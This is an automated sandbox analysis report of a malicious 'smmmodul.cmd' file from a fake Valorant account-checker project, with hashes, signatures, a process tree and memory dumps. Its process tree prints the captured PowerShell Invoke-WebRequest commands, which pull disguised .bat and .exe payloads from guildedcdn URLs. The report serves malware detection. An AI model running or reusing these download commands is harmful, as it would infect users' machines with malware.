Analysis

  • max time kernel
    146s
  • max time network
    154s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24/02/2024, 11:30

General

  • Target

    Valorant-Checker-Fast-Api-main/Valorant Checker/smmmodul.cmd

  • Size

    40B

  • MD5

    63d3668902029654d9323b2e4c5f762f

  • SHA1

    660f8b571f7c2ff7652a22e03b45cef480a74dc6

  • SHA256

    b27f89221aa7871f43fb77024485f569c6bc9e322ca9cef145e2b500bfa9fa02

  • SHA512

    bfc279e9c8cf86ca960065b66dbfe1b1326df5b1cd6d8272f48e7792bd920dcb65e80ff35644285525d1b99f6ecdd98de50a4a0f7ee6802979309929cb7c52c7

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\smmmodul.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1348
    • C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\py\resources.exe
      "C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\py\resources.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3948
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\5b24deb1-9771-4542-82f6-2d4da34417ed.bat
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1076
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1256
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:468
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2088
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:336
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1996
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4492
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 2
          4⤵
          • Delays execution with timeout.exe
          PID:3640
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3960
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 8
          4⤵
          • Delays execution with timeout.exe
          PID:3700
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2692

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    1KB

    MD5

    c0636f2d138baca01dbb2eedb99bf3d5

    SHA1

    3b927899db0f3e2cb510782592887dc02fc3e400

    SHA256

    10973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a

    SHA512

    0187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    e895c2aedf9d4b883d242cb9a16ca3c4

    SHA1

    012215e7782d314b156788eafb0e39c38d1f8aea

    SHA256

    0b1480efb637e7cc26eedad312715fae05f6ab5a892ee2e27e92456a3be8c4cd

    SHA512

    84428fc4026983b015f503aa2a51679a027eda63e290042483663ff7928fa818f235ca84eeac267857111cda72724bd41d4f017714cff6c1558125d89195f211

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    ecc0bf8e63d09e4b4b69a16d7e05024d

    SHA1

    6d5afd75f66bad8e075bf6df7eff1556ca9013b3

    SHA256

    e9d746db5a9ca664d02c4fd5d5c6ac450cbe9baeb13e8529485da4b9d43a3698

    SHA512

    cee10715353e7926476892460637ace274fd60edf503f345696f080edcfadabda74b0c2c1060d7bd42506436c08204d9bd803986cab917aa14274cf1bf98aea1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    71c0df38a184bdfc0a0b46236b04319b

    SHA1

    0ec6c4b0321d8cd940762acb3bffd2979bec161e

    SHA256

    d0457a6767d1eb7c72ea69451fd7eefb8716e7c5ee013b43891b69b8deca69d0

    SHA512

    55f8fb16e5b87fd81751a7c92d9164c6897f6c1e90ff7f8a8978bf0cf900ada93b210b867cf7648681a81317bbef0304429bdaa42bc78e23ab06ae6bc818023b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    e99da2b0042a75fc9304eec6c911a41a

    SHA1

    6b934f3b59bad76266b8ef90e17ecdb9088ee1f0

    SHA256

    676761b84405735cd2c2eebd1ecb57b2dd6dfa4efd224a174a10fb05c6a6a942

    SHA512

    d4cfac4c89e3def934af427cf0c854e60fadd791cf92f6b4a25a379afbbe3a06580335bff6cf3b147732aa7aa70f19fe10e3dd8f41504ac17d970c961ec85f17

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    9cdbfb010b3c4127e2ef260dbdf6100f

    SHA1

    f72d8906eb89ed74e67a17f3d754a1aacba79ffd

    SHA256

    357141e2eaa1f9bb6b0428677987e95ca2ea3ef5ce39aa018eab9bc43a0a85b1

    SHA512

    e43066c86b69eb733145db07599e3be1cadcbf8ecddf239ac475cdfb180c1ebffd82547beabcb319d962d8214289ed1082dfdc7bbded78f92ff4e976c70a660e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    adf3d185a8397bf1d8d070660616e196

    SHA1

    ae89ba5683ca86b417f5faa69e9a0990c55b7921

    SHA256

    82a63442681aee3cb13967f00b1d12f2724b0798736eb27ef4cf12fff9ad479a

    SHA512

    f869d24b069cf2b85a43e764388ae9df02b8c4b07245128ce7aa94de32b7d38ecf24fcf8cc8790a95c65fd15475128ab6d0bd69fc93bcfea428919b79dfa2854

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    2bc372a96d86133066f1354d56f37ee5

    SHA1

    fce219b2d82c4d1ec4d00aa11857fe7d9cbbc095

    SHA256

    2c2b635aaff07058bb941dc8d3027bedbc69cab80b2170d7ca8cebfcd7d5bba3

    SHA512

    2b8ce1f9d5830ce599179940976d1388ba8d9aca3e68f315941095afb1eec28db3aab91b7e4533eab5375da3ba3e6f4feb2f079f45f4b9782580684a337748b8

  • C:\Users\Admin\AppData\Local\Temp\5b24deb1-9771-4542-82f6-2d4da34417ed.bat

    Filesize

    1KB

    MD5

    d0cec99ca3a717c587689ebf399662c4

    SHA1

    1d4bbaf8079912ada46a6fa8693d8c20d5ec5b66

    SHA256

    b1ae110ef84ecec90a75742ca29adc0704b67abe8f093aa5a959ea0864766228

    SHA512

    99b21193db6615a33eb738c246229e9a7efcaf03fcab24654d67680396155a0c62cbc834078687d75d1892b1708383eafeda4f87e86b33bd827b18bc988122f7

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_crzedb5a.bdm.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/336-60-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/336-61-0x00000000028E0000-0x00000000028F0000-memory.dmp

    Filesize

    64KB

  • memory/336-73-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/336-62-0x00000000028E0000-0x00000000028F0000-memory.dmp

    Filesize

    64KB

  • memory/468-44-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/468-38-0x0000000005D50000-0x00000000060A7000-memory.dmp

    Filesize

    3.3MB

  • memory/468-31-0x00000000050E0000-0x00000000050F0000-memory.dmp

    Filesize

    64KB

  • memory/468-32-0x00000000050E0000-0x00000000050F0000-memory.dmp

    Filesize

    64KB

  • memory/468-30-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/1256-9-0x00000000051B0000-0x00000000051D2000-memory.dmp

    Filesize

    136KB

  • memory/1256-28-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/1256-25-0x0000000008500000-0x0000000008CA6000-memory.dmp

    Filesize

    7.6MB

  • memory/1256-24-0x0000000006560000-0x000000000657A000-memory.dmp

    Filesize

    104KB

  • memory/1256-23-0x00000000076D0000-0x0000000007D4A000-memory.dmp

    Filesize

    6.5MB

  • memory/1256-22-0x00000000060B0000-0x00000000060FC000-memory.dmp

    Filesize

    304KB

  • memory/1256-21-0x0000000006070000-0x000000000608E000-memory.dmp

    Filesize

    120KB

  • memory/1256-20-0x0000000005B20000-0x0000000005E77000-memory.dmp

    Filesize

    3.3MB

  • memory/1256-11-0x0000000005A50000-0x0000000005AB6000-memory.dmp

    Filesize

    408KB

  • memory/1256-10-0x00000000059E0000-0x0000000005A46000-memory.dmp

    Filesize

    408KB

  • memory/1256-8-0x00000000053B0000-0x00000000059DA000-memory.dmp

    Filesize

    6.2MB

  • memory/1256-7-0x0000000004D70000-0x0000000004D80000-memory.dmp

    Filesize

    64KB

  • memory/1256-6-0x0000000004D70000-0x0000000004D80000-memory.dmp

    Filesize

    64KB

  • memory/1256-5-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/1256-4-0x0000000004BF0000-0x0000000004C26000-memory.dmp

    Filesize

    216KB

  • memory/1996-86-0x00000000056E0000-0x0000000005A37000-memory.dmp

    Filesize

    3.3MB

  • memory/1996-75-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/1996-77-0x0000000002860000-0x0000000002870000-memory.dmp

    Filesize

    64KB

  • memory/1996-76-0x0000000002860000-0x0000000002870000-memory.dmp

    Filesize

    64KB

  • memory/1996-89-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/2088-46-0x0000000000D10000-0x0000000000D20000-memory.dmp

    Filesize

    64KB

  • memory/2088-56-0x0000000005760000-0x0000000005AB7000-memory.dmp

    Filesize

    3.3MB

  • memory/2088-59-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/2088-45-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/2088-47-0x0000000000D10000-0x0000000000D20000-memory.dmp

    Filesize

    64KB

  • memory/2692-117-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/2692-126-0x0000000006080000-0x00000000063D7000-memory.dmp

    Filesize

    3.3MB

  • memory/2692-130-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/2692-128-0x0000000006AF0000-0x0000000006B3C000-memory.dmp

    Filesize

    304KB

  • memory/3948-1-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/3948-74-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/3948-0-0x00000000003B0000-0x00000000003C6000-memory.dmp

    Filesize

    88KB

  • memory/3948-132-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/3960-105-0x0000000004B90000-0x0000000004BA0000-memory.dmp

    Filesize

    64KB

  • memory/3960-104-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/3960-116-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/4492-91-0x00000000030D0000-0x00000000030E0000-memory.dmp

    Filesize

    64KB

  • memory/4492-103-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/4492-90-0x0000000074EC0000-0x0000000075671000-memory.dmp

    Filesize

    7.7MB

  • memory/4492-92-0x00000000030D0000-0x00000000030E0000-memory.dmp

    Filesize

    64KB